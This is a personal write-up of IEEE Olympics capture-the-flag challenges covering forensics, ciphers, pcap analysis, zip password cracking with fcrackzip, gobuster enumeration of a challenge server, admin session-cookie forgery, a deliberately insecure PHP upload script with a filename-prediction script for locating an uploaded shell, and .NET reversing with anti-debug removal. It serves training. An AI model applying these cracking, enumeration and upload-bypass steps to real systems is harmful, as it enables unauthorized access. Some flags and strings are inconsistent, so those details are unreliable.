IEEE Olympics CTF Challenges Writeup

IEEE Olympics CTF Challenges Writeup

Featured image

hello friends, this is My writeup for IEEE CTF Misc & RE & Forensics & Web writeups.

Foreniscs

easy

You can download the challenge from here EASY.

binwalk EASY.dd

binwalk –dd=’.*’ EASY.dd

now we need to check all of them with exiftool

Comment : VRRR{Gu!f_vf_Gur_sy@t_T00q-W0o}

Flag: IEEE{THSISTHEFLGGDJB}

Misc Challenges

1.Caesar salad

from the challenge name i thought that this a Caesat Cipher but it was, Rail Fence Cipher, i tried all the Ciphers in this website til i got the flag.

Flag: IEEE{CaesarAintH4rd}

2.Uns3cure

we got a pcap file and i opened it with wireshark and it’s so easy to find the plaintext password, you can download the file from here

in this packet we can see that there is someone tell anotherone to login with ssh to make something.

in this packet we found a plaintext with the same name of the challenge and we can confirm that this is the right password from the next packet.

Flag: IEEE{so_Uns3cure}

3.warm up

we hava base64 hash and when we decrypt it i got another md5 hash, but we need to fix the hash as mensioned in the description of the challenge.

False md5 hash: 482c811dha5d5b4bc6d497ffa98491ze38

Correct md5 hash: 482c811da5d5b4bc6d497ffa98491e38

Flag: IEEE{password123}

4.Brute Me

i just cracked tha password and got the flag.

fcrackzip -u -v -D -p /usr/share/wordlists/rockyou.txt flag.zip

Flag: IEEE{Easy_Brute}

Web Challenges

1. S3ssion master

in this challenge we will play with the session cookie to get admin privilege to read the flag.

i played with the session but i can’t figure what is it and how can we got the admin cookie until i see hint for this challenge.

gobuster dir -u http://207.154.231.228:3000/ -w /usr/share/dirb/wordlists/common.txt -s 200,301


╭─xdev05@nic3One ~/Downloads/IEEE/writeup  
╰─➤  gobuster dir -u http://207.154.231.228:3000/ -w /usr/share/dirb/wordlists/common.txt -s 200,301
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://207.154.231.228:3000/
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,301,302
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/28 09:07:37 Starting gobuster
===============================================================
/sess (Status: 301)
===============================================================
2020/09/28 09:08:05 Finished
===============================================================

after opening this dir i noticed that, every chat for dir and the file in the latest dir are cookie, let’s see.

so the other dir will ne the session for the admin let’s see.

if we compined the dirs and the name of the file in it we will optain the admin session.

admin session: ry t2 w3 nd 2n xx on rd bq d7 qh 1o k71bzpev8zpa7vgnn24db4m4imvrhzo1zatw10iv

Flag: IEEE{wh0 473 my c00k13?}

2.S3cure uploader


<?php
if(isset($_GET["upload"])) {
$target_dir = "uploads/";
$vars = explode(".", $_FILES["FileToUpload"]["name"]);
$filename=$vars[0];
$ext = $vars[1];
//randomizing file name
$time = date('Y-m-d H:i:s');
$new_name = md5(rand(1,1000).$time.$filename."0x4148fo").".".strtolower(pathinfo(basename($_FILES["FileToUpload"]["name"]),PATHINFO_EXTENSION));
$filename=explode(".", $_FILES["FileToUpload"]["name"])[0];
$ext = $filename=explode(".", $_FILES["FileToUpload"]["name"])[1];
$target_file = $target_dir . "$new_name";
// Check if file already exists
if (file_exists($target_file)) {
  echo "File already exists.";
  $uploadOk = 0;
  die();
}
// Check file size
if ($_FILES["FileToUpload"]["size"] > 500000) {
  echo "File is too large.";
  $uploadOk = 0;
  die();
}
$uploadOk = 1;
$check = getimagesize($_FILES["FileToUpload"]["tmp_name"]);
if($check !== false) {
    $uploadOk = 1;
} else {
    echo "File is not an image.";
    $uploadOk = 0;
    die();
  }
}
move_uploaded_file($_FILES["FileToUpload"]["tmp_name"], $target_file);
if(strtolower(pathinfo(basename($_FILES["FileToUpload"]["name"]),PATHINFO_EXTENSION))=="jpg"){
echo "File uploaded successfully to $target_file";
}
else{
	die("Invalid file type");
}
?>


#!/usr/bin/python
import os

import hashlib

date = "2020-09-27 21:25:01"
filename = "shell"
key = "0x4148fo"
print(key)
with open("final.txt", 'w') as f:
	for i in range(1,1001):
		string = str(str(i)+date+filename+key).encode('utf-8')
		hash = hashlib.md5(string).hexdigest()
		print('{}'.format(hash), file=f)

S3cure uploader Walkthrough

Video

Reverse Challenges

1.Dot Free

You can download the program from here rev.exe

So let’s use dnspy to decompile and see the code.

Flag: IEEE{Free_Points_4_u}

2.Trivia fun

You can download the program from here trivia.exe

The first one is asking for a username and password.

It’s .NET so let’s use dnspy to get them.

remove the code by right clicking and then edit the class then just remove the anti debugging code and compile and save

First step:

Now we can solve the first step which is the username and password, which the code responsible for validating them is in Trivia_Form.

Username = AAAAA-AAAAA-AAAAA-AAAAA-AAAAA, which matches the regex.

Password: zzzzzzzzzzzzzzzd, their sum of the ascii value = 1930

Seconed step:

Solving the second step, which is the code responsible for validating the answer is in Qs_l1.

Let’s write a script to bruteforce the answer:


import string
enc = "Gu4g_J0hyq_o3_Mn_Z4GpU"
alpha = string.ascii_letters
ans = ""
i = 0
while(i<22):
  if((ord(enc[i])>= 97 and ord(enc[i])<= 122) or (ord(enc[i])>= 65 and ord(enc[i])<= 90)):
    for c in alpha:
      if (ord(c)>= 97 and ord(c)<= 122):
        if (ord(c) > 109):
          if(chr(ord(c) - 13) == enc[i]):
            ans += c
            break
        else:
            if(chr(ord(c) + 13) == enc[i]):
              ans += c
              break
      elif (ord(c)>= 65 and ord(c)<= 90):
        if (ord(c) > 77):
          if(chr(ord(c) - 13) == enc[i]):
            ans += c
            break
        else:
          if(chr(ord(c) + 13) == enc[i]):
            ans += c
            break
  else:
    ans+=enc[i]
  i+=1
print(ans)

The answer is: Th4t_W0uld_b3_Za_M4TcH

Third step:

Solving the second step, which is the code responsible for validating the answer is located in Qs_l2.

Let’s try to break it to understand it better.

It just makes sure that the answer length is divisible by 3 and then divides it into 3 different arrays after converting them to their ascii equivalent.

Create the xor key by shifting with different values.

Xor the answer with the keys and adding some values after.then concatenate all of them and compare it with: X5Q;DU~<{6p87)[ad1.

Let’s write a script to get the answer


using System;
using System.Linq;
class Trivia {
    int[] convert_carr_iarr(char[] carr)
		{
			int[] array = new int[carr.Length];
			for (int i = 0; i < carr.Length; i++)
			{
				array[i] = (int)carr[i];
			}
			return array;
		}
	char[] convert_iarr_carr(int[] carr)
		{
			char[] array = new char[carr.Length];
			for (int i = 0; i < carr.Length; i++)
			{
				array[i] = (char)carr[i];
			}
			return array;
		}
 
	public string get_answer(string answer)
	{
		while (answer.Length % 3 != 0)
		{
			answer += "=";
		}
		int[] array;
		int[] array2;
		int[] array3;
		array = this.convert_carr_iarr(answer.Substring(0, answer.Length / 3).ToCharArray());
		array2 = this.convert_carr_iarr(answer.Substring(answer.Length / 3, answer.Length / 3).ToCharArray());
		array3 = this.convert_carr_iarr(answer.Substring(2 * answer.Length / 3, answer.Length / 3).ToCharArray());
		int[] array4 = new int["Z09CWQl".Length];
		int[] array5 = new int["Z09CWQl".Length];
		int[] array6 = new int["Z09CWQl".Length];
		for (int i = 0; i < "Z09CWQl".Length; i++)
		{
			int num = (int)"Z09CWQl"[i];
			array4[i] = num >> 3;
			array5[i] = num >> 4;
			array6[i] = num >> 2;
		}
		for (int j = 0; j < array.Length; j++)
		{
			array[j] ^= array4[j];
		}
		for (int k = 0; k < array2.Length; k++)
		{
			array2[k] = ((array2[k]-6) ^ array5[k]);
		}
		for (int l = 0; l < array3.Length; l++)
		{
			array3[l] = ((array3[l]-8) ^ array6[l]);
		}
		return string.Join<char>("", this.convert_iarr_carr(array).ToList<char>().Concat(this.convert_iarr_carr(array2).ToList<char>()).Concat(this.convert_iarr_carr(array3).ToList<char>()));
	}
  public static void Main() {
      string enc_answer = "X5Q;DU~<{6p`87)[`ad1.";
      Trivia h = new Trivia();
      string ans = h.get_answer(enc_answer);
      Console.WriteLine(ans);
 
  }
}

The answer is: S3V3N_s3v3n_777_VII==

After solving all the questions it says to look at the code so let’s check the code.

So it decrypts ‘whoami’ so let’s create a breakpoint and check what does it return.

Just set a breakpoint before returning to get the result value.

Flag: Flag{To_P4tch_0r_Not_To_P4tch}